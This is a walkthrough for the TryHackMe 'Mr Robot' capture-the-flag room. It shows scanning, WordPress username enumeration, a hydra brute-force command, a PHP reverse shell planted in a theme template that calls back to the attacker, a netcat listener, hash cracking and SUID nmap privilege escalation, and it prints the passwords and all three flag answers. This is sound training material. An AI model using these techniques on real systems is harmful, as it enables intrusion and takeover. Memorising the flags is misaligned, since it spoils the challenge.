# Mr Robot CTF {% embed url="" %} {% endembed %} | Room Attributes | Value | | --------------------- | ---------------------------------------------------------------------- | | Subscription Required | False \[Free] | | Type | Challenges (CTF) | | Difficulty | Medium | | Tags | MrRobot, Root, Beginner | ## Video Walkthrough {% embed url="" %} TryHackMe Mr Robot Official Walkthrough {% endembed %} ## Task 1 - Connect to our network ### Go to your [access](http://tryhackme.com/access) page and download your configuration file. {% hint style="success" %} No answer needed {% endhint %} ### Use an OpenVPN client to connect. In my example I am on Linux, on the access page we have a windows tutorial. {% hint style="success" %} No answer needed {% endhint %} ### You are now ready to use our machines on our network! {% hint style="success" %} No answer needed {% endhint %} ### Now when you deploy material, you will see an internal IP address of your Virtual Machine. {% hint style="success" %} No answer needed {% endhint %} ## Task 2 - Hack the machine ### What is key 1? Running [nmap](https://thmflags.gitbook.io/thm-walkthroughs/difficulty-easy/nmap) or [rustscan](https://thmflags.gitbook.io/thm-walkthroughs/difficulty-easy/rustscan) against the target returns two open ports on port 80 and 443. ``` rustscan -b 1500 -a TARGET_IP --range 1-1000 ``` ``` PORT STATE SERVICE REASON 80/tcp open http syn-ack 443/tcp open https syn-ack ``` {% hint style="warning" %} **HINT:** Robots {% endhint %} Checking the [robots.txt](https://www.cloudflare.com/en-gb/learning/bots/what-is-robots.txt/) file shows two interesting files: * fsocity.dic * key-1-of-3.txt ![robots.txt](https://969802554-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuhNyf6qCYVqCOnFlkxNz%2Fuploads%2FQoE7u5zfQhrT4xajywwd%2FScreenshot_2022-06-24_23-19-50.png?alt=media\&token=69d184f6-5158-4938-bc88-4bb71b627f3c) **key-1-of-3.txt** contains the first flag:
Reveal Flag 🚩 :triangular\_flag\_on\_post:`073403c8a58a1f80d943455fb30724b9`
### What is key 2? Next run dirb, dirbuster, or gobuster against the target to find some interesting URLs: ``` gobuster dir -u http://TARGET_IP/ -w /usr/share/wordlists/dirb/common.txt ``` ``` /.hta (Status: 403) [Size: 213] /.htaccess (Status: 403) [Size: 218] /.htpasswd (Status: 403) [Size: 218] /0 (Status: 301) [Size: 0] [--> http://10.10.121.252/0/] /admin (Status: 301) [Size: 235] [--> http://10.10.121.252/admin/] /atom (Status: 301) [Size: 0] [--> http://10.10.121.252/feed/atom/] /audio (Status: 301) [Size: 235] [--> http://10.10.121.252/audio/] /blog (Status: 301) [Size: 234] [--> http://10.10.121.252/blog/] ``` `/0` opened a wordpress blog. Going to the login screen `http://TARGET_IP/wp-login.php` shows the wordpress login screen. Entering the username 'admin' and the password 'admin' presents an error message: {% hint style="danger" %} **ERROR**: Invalid username. {% endhint %} ![](https://969802554-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuhNyf6qCYVqCOnFlkxNz%2Fuploads%2FaHDEoLDEAwgsPquC1jna%2FScreenshot_2022-06-24_23-18-55.png?alt=media\&token=2d8f3ffc-23df-4ab6-b967-b1eaf20e1316) This page can be used to enumerate valid usernames as when providing the username '`elliot`' ([the main character's name in Mr. Robot](https://mrrobot.fandom.com/wiki/Elliot_Alderson)) the error states the password is wrong: {% hint style="danger" %} **ERROR**: The password you entered for the username **elliot** is incorrect. {% endhint %} ![](https://969802554-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuhNyf6qCYVqCOnFlkxNz%2Fuploads%2FljzznPrKrNklTszi4kvj%2FScreenshot_2022-06-24_23-19-16.png?alt=media\&token=674f41df-e17c-4b71-b4d4-90e9d2e4f9ca) Looking at `fsocity.dic` there are a number of duplicate entries so we can strip those out to optimise the wordlist: ``` sort fsocity.dic | uniq > fsocity-sorted.dic ``` We can then use [wpscan](https://github.com/wpscanteam/wpscan/wiki/WPScan-User-Documentation), [hydra](https://github.com/vanhauser-thc/thc-hydra), or [burp suite intruder](https://portswigger.net/burp/documentation/desktop/tools/intruder/using) (slow) to brute force the password. ``` hydra -l 'elliot' -P Documents/THM/mrrobot/fsocity-sorted.dic TARGET_IP -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' -t 16 ``` You should find the password around the 5000th attempt.
Elliot's Password `ER28-0652`
{% hint style="warning" %} **HINT:** White coloured font {% endhint %} Once logged into wordpress as an admin we can check out the image gallery. One image has white text in the background which reveals another username and also their password: ![hello friend](https://969802554-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuhNyf6qCYVqCOnFlkxNz%2Fuploads%2FhiHtUDaRW7Ny4gX3bc6W%2FScreenshot_2022-06-24_23-16-57.png?alt=media\&token=518b678e-7de2-408c-b9f7-70204a72f12a) In order to turn our wordpress access into a shell we can edit the templates to add the [PHP PenTestMonkey](https://www.revshells.com/) reverse shell pointing to your tun0 IP address into the 404.php template file: {% embed url="" %} {% endembed %} ![Adding PHP PenTestMonkey reverse shell to the 404.php template file](https://969802554-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuhNyf6qCYVqCOnFlkxNz%2Fuploads%2FhMAfZpXVJFerKLnyKOKp%2FScreenshot_2022-06-24_23-17-57.png?alt=media\&token=5a6c0462-9506-46a0-9b97-5048c6f4714c) Start a netcat listener on your machine then open the 404.php page in a browser to trigger the reverse shell. ``` listening on [any] 4444 ... connect to [10.9.12.198] from (UNKNOWN) [10.10.121.252] 37394 Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux 19:03:27 up 46 min, 0 users, load average: 0.05, 0.06, 0.13 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=1(daemon) gid=1(daemon) groups=1(daemon) bash: cannot set terminal process group (1998): Inappropriate ioctl for device bash: no job control in this shell daemon@linux:/$ ``` With a shell we can extract the md5 hash from password.raw-md5 from the daemon /home/robot/ directory: ``` daemon@linux:/$ cd /home/robot daemon@linux:/home/robot$ ls key-2-of-3.txt password.raw-md5 daemon@linux:/home/robot$ cat password.raw-md5 robot:c3fcd3d76192e4007dfb496cca67e13b ``` We can reverse the hash using [crackstation](https://crackstation.net/): {% embed url="" %} {% endembed %}
HashTypeResult
c3fcd3d76192e4007dfb496cca67e13bmd5(expand below)
robot User Password `abcdefghijklmnopqrstuvwxyz`
Trying to cat key-2-of-3.txt we find that we don't have adequate permissions: ``` daemon@linux:/home/robot$ cat key-2-of-3.txt cat: key-2-of-3.txt: Permission denied ``` Trying to run su results in an error message saying we need to run it in a terminal ``` daemon@linux:/home/robot$ su robot su: must be run from a terminal ``` To get past this we need to upgrade our shell to a TTY shell: {% embed url="" %} {% endembed %} ``` daemon@linux:/home/robot$ python -c 'import pty; pty.spawn("/bin/sh")' ``` ``` $ su robot Password: (expand above) ``` ``` robot@linux:~$ cat key-2-of-3.txt (reveal flag #2 below) ```
Reveal Flag 🚩 :triangular\_flag\_on\_post:`822c73956184f694993bede3eb39f959`
### What is key 3? {% hint style="warning" %} **HINT:** nmap {% endhint %} The final flag is in the root directory so in order to reach that we need to privilege escalate our current shell. Searching the filesystem for files with the SUID bit set we find that nmap is installed and SUID is set: ``` robot@linux:~$ find / -perm /4000 /bin/ping /bin/umount /bin/mount /bin/ping6 /bin/su find: /etc/ssl/private': Permission denied /usr/bin/passwd /usr/bin/newgrp /usr/bin/chsh /usr/bin/chfn /usr/bin/gpasswd /usr/bin/sudo /usr/local/bin/nmap /usr/lib/openssh/ssh-keysign /usr/lib/eject/dmcrypt-get-device /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper /usr/lib/pt_chown ``` GTFOBins shows the steps to run nmap in interactive mode which you can abuse to run commands as root: {% embed url="" %} {% endembed %} ``` nmap --interactive nmap> !sh ``` ``` robot@linux:~$ nmap --interactive nmap --interactive Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ ) Welcome to Interactive Mode -- press h for help nmap> !sh !sh # ``` With root shell we can access the root directory and obtain our final flag! ``` # cd /root cd /root # ls ls firstboot_done key-3-of-3.txt # cat key-3-of-3.txt cat key-3-of-3.txt (reveal flag #3 below) ```
Reveal Flag 🚩 :triangular\_flag\_on\_post:`04787ddef27c3dee1ee161b21670b4e4`